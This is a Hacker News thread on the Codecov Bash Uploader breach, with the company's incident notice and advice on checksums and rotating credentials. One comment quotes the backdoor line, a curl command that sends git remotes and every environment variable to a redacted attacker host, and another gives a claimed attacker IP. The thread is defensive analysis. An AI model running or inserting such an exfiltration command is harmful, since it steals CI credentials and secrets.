Codecov Bash Uploader compromised (codecov.io)
198 points by xiaq 7 months ago | 77 comments



> How did Codecov learn of this event?

> A customer reported this to us on the morning of April 1, 2021. This customer was using the shasum that is available on our Bash Uploader to confirm the integrity of the uploader fetched from https://codecov.io/bash.

> Once the customer saw a discrepancy between the shasum on Github and the shasum calculated from the downloaded Bash Uploader, they reported the issue to us, which prompted our investigation.

shoutout to this user for actually checking the shasum


So it took two months from the initial modification until someone bothered to check the shasum of their download?!


Of all the people in tech I know, as friends or professionally, exactly one is diligent about comparing checksums, and he's the same guy with a multi-thousand-dollar homelab. Absolutely nobody does this regularly unless they've automated it or they have an obsession with privacy (to be fair, nothing wrong with that; it's just exceptionally rare).


I guess I'm unusual - I check hashes of manually downloaded files if the domain I'm downloading from isn't the same as the domain with the download link. It only takes 5 seconds, and saves me from partial downloads too (you'd be amazed how many files kinda-almost work but have odd bugs if half downloaded)
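
For anyone who hasn't made a habit of it, the whole check really is one line. A minimal sketch (the hash and filename here are placeholders; copy the real hash from the vendor's download page):

  # EXPECTED is a placeholder - paste the published SHA-256 from the download page
  EXPECTED=0000000000000000000000000000000000000000000000000000000000000000
  echo "$EXPECTED  some-download.tar.gz" | sha256sum --check -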


Why they're not continuously checking it is beyond me.


It seems like this would be a nice small service: publicly compare checksums of software and flag/notify on mismatch. And maybe make it easier for people to grab the checksums for packages and check them themselves.

Edit: I just bought hecksum.com.
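
A bare-bones version of that check is scriptable today. A rough sketch, assuming (as with Codecov) that the vendor publishes a checksum file in their GitHub repo next to the script; the URLs and file layout here are illustrative, not necessarily Codecov's actual ones:

  # Compare the script as served against the checksum published in the source repo.
  served=$(curl -fsSL https://codecov.io/bash | sha256sum | cut -d' ' -f1)
  published=$(curl -fsSL https://raw.githubusercontent.com/codecov/codecov-bash/master/SHA256SUM | cut -d' ' -f1)
  if [ "$served" != "$published" ]; then
    echo "ALERT: served uploader no longer matches the published checksum" >&2
    exit 1
  fi

Run that on a schedule and alert on a non-zero exit, and you have the core of the service.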


Public key signatures would be even better. Then you only need to install / audit / trust the public key once, versus updating the checksum for every new release. Of course, this assumes that signing isn't compromised too; if it is, you're pretty much out of luck, since a malicious release would be superficially indistinguishable from a real release.
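
For illustration, the consumer side of that model would look roughly like this. It's only a sketch: it assumes the vendor publishes a detached signature next to the script, which Codecov did not:

  # One-time: import the publisher's signing key, verified out of band.
  gpg --import vendor-release-key.asc
  # Every run: fetch the script and its detached signature; refuse to run on a bad signature.
  curl -fsSL https://example.com/uploader.sh -o uploader.sh
  curl -fsSL https://example.com/uploader.sh.sig -o uploader.sh.sig
  gpg --verify uploader.sh.sig uploader.sh && bash uploader.sh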


Well, that is what happened in the case of SolarWinds -- legit signatures on the DLL that was modified early in the supply chain. :-(


Here's[1] one way to actually curl + checksum then run in a Dockerfile, in case anyone wants it:

  RUN curl --location --show-error --silent --output get-poetry.py https://raw.githubusercontent.com/python-poetry/poetry/master/get-poetry.py \
      && echo '08336beb0091ab192adef2cedbaa3428dabfc8572e724d2aa7fc4a4922efb20a get-poetry.py' > get-poetry.py.sha256 \
      && sha256sum --check get-poetry.py.sha256 \
      && python3 get-poetry.py \
      && rm get-poetry.py get-poetry.py.sha256
[1] https://github.com/linz/geospatial-data-lake/blob/d3c5699ed8...


You can pipe directly into sha256sum, no need to write-read-delete a file:

  RUN curl --location --show-error --silent --output get-poetry.py https://raw.githubusercontent.com/python-poetry/poetry/master/get-poetry.py \
      && echo '08336beb0091ab192adef2cedbaa3428dabfc8572e724d2aa7fc4a4922efb20a get-poetry.py' | sha256sum --check \
      && python3 get-poetry.py \
      && rm get-poetry.py
Also this code is weird because it grabs the script from master and expects its hash to not change. It should probably grab a specific version of it, e.g. https://raw.githubusercontent.com/python-poetry/poetry/8b479... to avoid the code breaking and needing manual update every time Poetry makes a change to their repo.


Right, but, unless GitHub itself is majorly compromised (in which case checking the bash checksum doesn’t help), doesn’t having the commit SHA in the URL make the whole exercise pointless anyway?


Thanks for the sha256sum tip - I checked the man page, but it doesn't mention that it reads from standard input by default (only when passing the filename "-").

The code has only changed once in the few months I've been using it. Also, if we get a specific version we'd need an extra process to know when it's been updated. So for the current project it's pragmatic to just use the latest version.


It took Codecov two months to notice, and only because a customer was checking the shasum. Then it took them two more weeks to notify customers. Even if they blocked the attack vector during that time, the attacker had a two-week head start to use the stolen credentials before customers rotated them.

This is not a good look for Codecov.

edit: It seems not even their own code that used the bash uploader (GitHub Action, CircleCI orb, etc.) checked the shasum. No excuse about lack of user-friendliness there.


And they did not fix the code of their own runners (like GHA) to check the shasum either.


What were they doing for 2 weeks?


So, on "rotate your credentials", some of the things you'll need to do:

- Does your CI job query any system using a service account? Time to rotate that service account password. Hope it wasn't used by anything other than your CI system!

- Accessing systems using tokens instead of service accounts? Time to figure out how to invalidate those old tokens and gen a new one. (Also, time to find out if all the systems you use can do that)

- Using credentials as part of your build system, like downloading a for-pay plugin for a tool using a license key? Time to rotate those too.

- Time to rotate any license keys used at build-time.

- I hope you weren't using IAM users! If you weren't using instance profiles / task profiles, time to rotate those secret access keys (see the sketch after this list). Some things you have to use IAM users for, like SES, iirc.

- Time to invalidate everything you built since they were first compromised, invalidate all your caches, and re-build all your artifacts from scratch.

- Time to see if you had any customer information / PII / PHI /etc accessible from your CI system.

- If you deploy from your CI system, it could be that every system is potentially compromised. In which case, get ready to re-deploy everything after you have flushed and re-built everything from above step.

- Start auditing, get PR to start drafting a sad letter to customers, and get someone to investigate how to reset customer passwords etc if needed.
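
For the IAM-user item above, the rotation itself is mechanical with the AWS CLI. A sketch (the user name and key ID are placeholders):

  # List the CI user's access keys, mint a replacement, then retire the old one.
  aws iam list-access-keys --user-name ci-deploy-user
  aws iam create-access-key --user-name ci-deploy-user   # store the new key in your secret manager
  aws iam update-access-key --user-name ci-deploy-user --access-key-id AKIAOLDKEYID --status Inactive
  # Once everything works with the new key:
  aws iam delete-access-key --user-name ci-deploy-user --access-key-id AKIAOLDKEYID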


Haha, yup. And if you sign an Android app in CI, Codecov might have had access to your signing keys. Good luck changing those.


Building the entire backbone of a CI product on a `bash <(curl ...)` script. Honestly. This is a case of play stupid games, win stupid prizes. Did anyone even attempt to google "don't run random scripts from the internet" here?

There is a world of difference between offering a `bash <(curl ...)` for one-off development/laptop use and giving official instructions to put it in automation scripts. If someone is uploading code coverage reports for some language, they have far better, safer options: Maven packages, `go run`, npm packages, deb packages, etc. All of these have better security and checksumming built in.

From what's in the report, even all their other products (GitHub app, etc.) were built on top of this bash uploader script, and even their own hosted solutions did not validate its checksum. It looks like they were seriously pushing "just source a script from the internet" as an official practice. Of course the script was backdoored. Facepalm.


"bash <(curl" is the new cool. Mind-boggling number of projects pull this sh*, look at https://brew.sh/ for instance.


It took me a while to find this link, as helpfully the one they emailed out is checking some referral code and currently 500'ing.

I think we're probably okay, as we're an open source project, do pure testing on cloud CIs, and use the separate (non-bash) modules internally. Potentially compromising the GitHub app connection does sound immediately worrying, because of GitHub's terribly lax token permissions (e.g. the "all repositories or nothing" access): if they saw what the app connection could see, would they be able to see all private repos?

I'm somewhat sympathetic to sites that suggest curl | bash as a once-off installation. Advocating that your users curl | bash every time you test your code does sound quite a bit more irresponsible.


Interesting that no hash/checksum verification has yet been added to their CI actions, like here: https://github.com/codecov/codecov-action/blob/master/src/in...


Looks like a PR [1] was started 4 hours ago, but for such a simple task not much progress has been made.

Security breaches happen. If it hasn't happened to you yet, consider it luck. I'm disappointed by the lack of urgency in the response and the failure to take basic steps to improve their posture.

I hope this is a wake-up call for them and other SaaS companies.

[1] https://github.com/codecov/codecov-action/pull/282


From Eli Hooten, Codecov's CTO, in a personal message:

> Based on the nature of this attack I do not believe malicious actions were executed directly against the CI pipeline, nor do we have any evidence of it. I have included the malicious bash script for your review so you can fully understand the scope of the attack. Of interest is line 525

> line 525 was the only change we've observed. I have removed the IP address in the curl command as it is part of an ongoing federal investigation

Compromised script: https://gist.github.com/davidrans/ca6e9ffa5865983d9f6aa00b7a...

And here's line 525:

  curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://ATTACKERIP/upload/v2 || true
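  # (annotation: -s = silent, -m 0.5 = half-second timeout, -d = POST the git remotes
  # plus the entire environment to the attacker's server; "|| true" keeps the CI step
  # from ever visibly failing)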


So the hackers stole every environment variable for the context in which the Codecov script was run.

It means that if you use CI to deploy your code, all of your credentials have been leaked.


Why doesn't GitHub Actions limit the environment variables it exposes to jobs/steps? The codecov step doesn't need my GitHub or PyPI tokens! Environment variables should be opt-in for every step in the pipeline: I should have to explicitly list every environment variable I want to expose. This leak is as much on GitHub as it is on Codecov.


GitHub actually introduced "Environments" recently, which allow you to do what you are asking for. Lots of existing pipelines haven't migrated yet of course.

https://docs.github.com/en/actions/reference/environments


Nice!


GitHub Actions actually requires you to explicitly pass secrets to individual steps. If you're using GitHub Actions, what got leaked was the commit metadata, and the codecov token itself. Unless you manually passed the entire environment to the codecov step, that is.


Most CI systems have a GitHub token as an environment variable. That provides a second layer of attack.

By this time the attacker could have cloned all repositories, so any config, credentials, service account files, or anything else inside those repos should also be assumed compromised, not just environment variables.


This is really unfortunate. Using a curl to fetch executable code from a static URL is dangerous for a lot of reasons, but doing it on every CI run is... asking for trouble.

That said, I’m sure tons of folks will say the same thing. But any dynamically fetched code/modules/packages will suffer the same risk. While we have to be vigilant with those risks, there’s a more important step we can take and that’s to stop using static credentials for things like CI.

Instead, we need to be building and using tools that can generate time-bounded temporary credentials. For example, today it’s common to put your AWS IAM user key and secret directly into Github’s secret storage where it feeds directly into environment variables that can leak through this sort of attack. Instead, GitHub should provide a way to delegate access to fetch temporary credentials that are only valid for a few minutes from AWS STS. Amazon has multiple ways to make this happen, but GitHub needs to support it and GitHub’s users would need to use it.

And sure, AWS is just one of many secrets you probably have to work with, but GitHub and GitLab are in a position to make this sort of dynamic secret infra really commonplace and severely cut back on the damage these sorts of exploits can do, so I hope they are making that effort.
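
To make the AWS example concrete: the primitive already exists, what's missing is first-class CI integration. A rough sketch of minting short-lived credentials with STS (the role ARN and session name are placeholders):

  # Exchange a longer-lived identity for credentials that expire after 15 minutes.
  aws sts assume-role \
    --role-arn arn:aws:iam::123456789012:role/ci-deploy \
    --role-session-name "ci-run-example" \
    --duration-seconds 900
  # The response contains AccessKeyId / SecretAccessKey / SessionToken; export those for the
  # deploy step instead of keeping a permanent access key in the CI secret store.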


> But any dynamically fetched code/modules/packages will suffer the same risk.

A package manager usually employs signatures. In that case, the problem could have been avoided (unless the signing process itself is also compromised, in which case you're out of luck).


The issue only happens if the package manager platform is hacked rather than an individual package maintainer's credentials. The latter usually requires a new version to be pushed which people will notice and ask about (it's happened before). If the package manager platform is hacked then you're in trouble unless you employ a lock file.


Considering the data at risk, the delay in notifying users was too long. That's 15 days in which the attacker, having potentially been tipped off by the remediation, could hastily make use of the stolen data.


> How do I know what environment variables of mine may have been available to the actor?

> You can determine the keys and tokens that are surfaced to your CI environment by running the env command in your CI pipeline. If anything returned from that command is considered private or sensitive, we strongly recommend invalidating the credential and generating a new one. Additionally, we would recommend that you audit the use of these tokens in your system.

Be aware that the output will be sent to your CI output logs. If those logs are public (e.g. a FOSS project), they will be published publicly and expose all your environment secrets.
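
If you only want to audit which variables are exposed, a small tweak keeps the values out of the logs entirely:

  # Print variable names only; the values never reach the build log.
  env | cut -d= -f1 | sort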


Most (all?) major CI providers automatically censor secrets printed in the worker log, so this is not as much of a concern. :)


> How do I know what environment variables of mine may have been available to the actor?

Isn't that a tiny portion of what you would have to worry about? They seem too confident that they know exactly what unintended code was in the bash uploader script for the entire duration. Is there something about the setup that gives them that confidence?


> How did Codecov learn of this event?

> A customer reported this to us on the morning of April 1, 2021. This customer was using the shasum that is available on our Bash Uploader to confirm the integrity of the uploader fetched from https://codecov.io/bash.

> Once the customer saw a discrepancy between the shasum on Github and the shasum calculated from the downloaded Bash Uploader, they reported the issue to us, which prompted our investigation.

Just goes to show that checking published hashes is not as useless as it may seem.


> Just goes to show that checking published hashes is not as useless as it may seem.

It's better than nothing but if the first script that you are fetching is itself fetching other scripts without validation, you have the same problem, just hidden one level deeper.


I wish they'd release the code that was modified so a threat assessment can be made



Curious how you found that. Great find though. This is the exact line:

https://gist.github.com/davidrans/ca6e9ffa5865983d9f6aa00b7a...



I'm curious if they even know right now or if the code was being injected dynamically somehow. The post is sparse on the details.


Unfortunately archive.org last fetched the script in November last year: https://web.archive.org/web/2020*/https://codecov.io/bash

A quick diff against the current version doesn't show anything suspicious.


> Codecov takes the security of its systems and data very seriously and we have implemented numerous safeguards to protect you.

Right at the start of the article - classic bit of corporate/PR BS to insulate the actually important information


It would be interesting to see what the compromised version of the bash script did, and how, more specifically.

Software supply chain attacks seem to be becoming more common. I guess it's no surprise, considering how powerful an attack vector it is.


An advanced attack would fetch more code from a remote server, and that extra code would be client specific.

It would probably just open up a reverse shell or something like that, so the attacker's server can do whatever it likes, and it's much harder to analyze exactly what has been stolen.

The logic of what to steal could vary based on the environment etc.


> It would probably just open up a reverse shell or something like that

Codecov is a service meant to be run in CI, so your reverse shell would just be running in a GitHub/GitLab/... CI job. Not very interesting. You can however grab tokens from the environment that will give you access to the GitHub/GitLab/... repositories, which is much more valuable than getting a shell.

It looks like it's exactly what they did: https://news.ycombinator.com/item?id=26825432


Trying to suss out the damage but getting a 502. Raises the question: who's deploying static sites not behind a CDN? Assuming this site is static.


And their page is down so I can't find out any details. Great.


I know. I got the email and tried to follow the link. It would've been good to include all the information in the email.


copypasta here:

About the Event

Codecov takes the security of its systems and data very seriously and we have implemented numerous safeguards to protect you. On Thursday, April 1, 2021, we learned that someone had gained unauthorized access to our Bash Uploader script and modified it without our permission. The actor gained access because of an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify our Bash Uploader script.

Immediately upon becoming aware of the issue, Codecov secured and remediated the affected script and began investigating any potential impact on users. A third-party forensic firm has been engaged to assist us in this analysis. We have reported this matter to law enforcement and are fully cooperating with their investigation.

Our investigation has determined that beginning January 31, 2021, there were periodic, unauthorized alterations of our Bash Uploader script by a third party, which enabled them to potentially export information stored in our users' continuous integration (CI) environments. This information was then sent to a third-party server outside of Codecov’s infrastructure.

The Bash Uploader is also used in these related uploaders: Codecov-actions uploader for Github, the Codecov CircleCl Orb, and the Codecov Bitrise Step (together, the “Bash Uploaders”). Therefore, these related uploaders were also impacted by this event.

The altered version of the Bash Uploader script could potentially affect:

- Any credentials, tokens, or keys that our customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed.

- Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys.

- The git remote information of repositories using the Bash Uploaders to upload coverage to Codecov in CI.

Recommended Actions for Affected Users

Because of our commitment to trust and transparency, we have worked diligently to determine the potential impact to our customers and identify customers who may have used the Bash Uploaders during the relevant time periods. For affected users, we have emailed you on April 15th using your email address on file from GitHub / GitLab / Bitbucket, and there is a notification banner after you log in to Codecov.

We strongly recommend affected users immediately re-roll all of their credentials, tokens, or keys located in the environment variables in their CI processes that used one of Codecov’s Bash Uploaders.

You can determine the keys and tokens that are surfaced to your CI environment by running the env command in your CI pipeline. If anything returned from that command is considered private or sensitive, we strongly recommend invalidating the credential and generating a new one. Additionally, we would recommend that you audit the use of these tokens in your system.

Additionally, if you use a locally stored version of a Bash Uploader, you should check that version for the following:

  curl -sm 0.5 -d "$(git remote -v)

If this appears anywhere in your locally stored Bash Uploader, you should immediately replace the bash files with the most recent version from https://codecov.io/bash.

If you use a self-hosted (on-premises) version of Codecov, it is very unlikely you are impacted. To be impacted, your CI pipeline would need to be fetching the Bash Uploader from https://codecov.io/bash instead of from your self-hosted Codecov installation. You can verify from where you are fetching the Bash Uploader by looking at your CI pipeline configuration.

If you conducted a checksum comparison before using our Bash Uploaders as part of your CI processes, this issue may not impact you.

Actions Taken by Codecov

We have taken a number of steps to address this situation, including:

- rotating all relevant internal credentials, including the key used to facilitate the modification of the Bash Uploader;

- auditing where and how the key was accessible;

- setting up monitoring and auditing tools to ensure that this kind of unintended change cannot occur to the Bash Uploader again; and

- working with the hosting provider of the third-party server to ensure the malicious webserver was properly decommissioned.

Codecov maintains a variety of information security policies, procedures, practices, and controls. We continually monitor our network and systems for unusual activity, but Codecov, like any other company, is not immune to this type of event. We are also working to further enhance security so we can stay ahead of this type of activity, including reinforcing our security tools, policies, and procedures.

We will continue to share with you as much information as we are able and encourage you to reach out to us with any questions or concerns you have at security@codecov.io.

We value the trust you place in us and our solutions and pledge to continuously work to earn it. We regret any inconvenience this may cause and are committed to minimizing any potential impact on you, our users and customers.

Sincerely,
Jerrod Engelberg
CEO, Codecov


I'm Jerrod Engelberg, CEO of Codecov, and I'm confirming the above is factual. Sorry about the outage on the details page.


Why did you wait 2 weeks to notify us?


Can you please tell users which repositories were affected? This situation is ridiculous for users with dozens of repositories, using various CIs and various code coverage providers. A lot of checking, cleaning, rotating. The way you disclosed the issue is not helpful.


How would they do that? The bash script is a static file on a public host. Users can simply download it, without Codecov knowing about the repos it's being used in.

Never automatically download any remote code without at least checking the checksum.


The e-mail they sent includes "Unfortunately, we can confirm that you were impacted by this security event." which means that they know. I guess there is an API endpoint that is specific to Bash Uploader and they use that + dates of API requests to figure out who was impacted. This must also contain the repository info (and they just confirmed that they can figure this out).


That may be wrong. I use the ruby gem and the email says that would not be affected but at the same time the email says I was affected. I'm re-rolling to be sure, but it would help not having conflicting information in the same email.


Hey, yes, we can help you figure out which repos; there is an FAQ in the post about this, or you can email us at security [at] codecov.io.


Could you tell us how you determined who has or has not been affected?


> The actor gained access because of an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify our Bash Uploader script.

Docker layers hiding secrets is a big problem. Any solution other than education?


Clean room builds. Set up an environment with no access to anything (other than a NAT gateway). Copy only the files needed to do the build into the environment. Run the build. At the end of the build, capture the artifacts. Tear it all down at the end.

For a Docker container, that might look like:

  1. Create an EC2 instance with no IAM permissions, and a user with ~/.ssh/authorized_keys to allow copying in files.
  2. Install Docker.
  3. Copy all files for your build to the host. Make sure not to copy any secrets (!).
  4. Run the 'docker build'.
  5. Set up remote registry authentication.
  6. 'docker push' the built image to the remote registry.
In that environment, the only "secrets" that can end up in the container are ones you copied to the EC2 instance (which shouldn't have been there, just as secrets shouldn't be in your source code). So then you also make sure the process that preps your files for copying contains no secrets.


This: a whole separate machine might be overkill, but try your hardest to make your build not require secrets, and run it where the secrets aren't. This is usually not too hard, as you can use other methods to restrict access to whatever remote files the build needs to access.

Even for my local manual builds, I started doing this from fresh git-worktrees that I do no development in, as .env/.git/.log files tend to accumulate in your development copy and are very easy to put in the Docker image by mistake.
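
A minimal sketch of that workflow (paths and tags are illustrative):

  # Build from a pristine checkout so stray .env / log files in the working copy
  # can never end up in the image by accident.
  git worktree add ../clean-build v1.2.3
  docker build -t myapp:v1.2.3 ../clean-build
  git worktree remove ../clean-build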


Basically what you want is a Docker image static analysis tool in your CI/CD that rejects your pull request if it seems to contain a secret.

I'm not really sure what would be the best tool for this, but googling got me to https://sysdig.com/blog/20-docker-security-tools/ which has enough scanning tools to research. I don't think any will be foolproof though.

Maybe you can also do what this guy did, use conftest with some OPA rules to detect what seems like a secret: https://cloudberry.engineering/article/dockerfile-security-b...

If your secrets all follow RFC 8959 ( https://tools.ietf.org/html/rfc8959 ) then you could make it foolproof by just searching for secret-token: with the tool from the previous blog post. However, I've yet to find a place that uses this RFC for all secrets.
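
A crude version of that search, assuming the classic `docker save` layout where each layer is its own tar (newer Docker versions may lay the archive out differently):

  # Dump the image and grep every layer's contents for the RFC 8959 prefix.
  docker save myimage:latest -o image.tar
  mkdir -p layers && tar -xf image.tar -C layers
  for layer in layers/*/layer.tar; do
    if tar -xOf "$layer" 2>/dev/null | grep -aq 'secret-token:'; then
      echo "possible secret found in $layer"
    fi
  done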


- If you don't care about the layer cache, flattening the image can get rid of things from intermediate layers

- If you're using BuildKit, there's secret support there: https://docs.docker.com/develop/develop-images/build_enhance...
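
For reference, the BuildKit route looks roughly like this (the secret id and file names are illustrative):

  # syntax=docker/dockerfile:1.2
  # In the Dockerfile: the secret is mounted only for this RUN step and never written to a layer.
  RUN --mount=type=secret,id=npm_token \
      NPM_TOKEN="$(cat /run/secrets/npm_token)" npm ci

  # At build time (shell), pass the secret in from a local file:
  # DOCKER_BUILDKIT=1 docker build --secret id=npm_token,src=./npm_token.txt .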


I know, but these solutions rely on developers being aware and following best practices in the first place.

The problem is that anything that isn't on by default, or at least in the getting-started guide, is going to be missed by a significant chunk of the user base, so it's important to make security as automatic as possible. GitHub token scanning is nice for limiting secrets exposure in public git repos, for instance.


In general your secrets should expose the minimum access needed for the actions being performed. For a Docker build that'd likely be reading rather than writing data. Prefer short-term, rotated credentials over long-term ones.

The goal is defense in depth so that even if a secret is leaked the damage is minimal.


Do they mean that the Docker image at https://github.com/codecov/codecov-action contained a secret allowing someone to modify the script served by https://codecov.io/bash?


Bleeping Computer may have identified the attacker's IP in a screenshot? https://www.bleepingcomputer.com/news/security/popular-codec...

104.248.94.23


This is a very concerning trend. The reliance on external tools is causing them to be a much more frequent attack vector.

SolarWinds, the GitHub Actions thing, and now this.


Is it safe to assume that https://codecov.io/env was not compromised?


Given other comments in this post, I think at this point it's not safe to assume that.


Does anyone have the bash uploader script on hand with version 20210309-2b87ace?


This looks to be that version: https://github.com/ehmicky/dev-tasks/blob/1f6cd2a9c7bc2146b7...

Though this was uploaded before April 1, and it doesn't appear to have any malicious code.


does anybody know the shasum of the infected version of that script?


"Is it safe to use Codecov systems and services?

Yes. Codecov takes the security of its systems and data very seriously and we have implemented numerous safeguards to protect them."


shouts to whoever is out there rotating keys since the announcement of this incident.



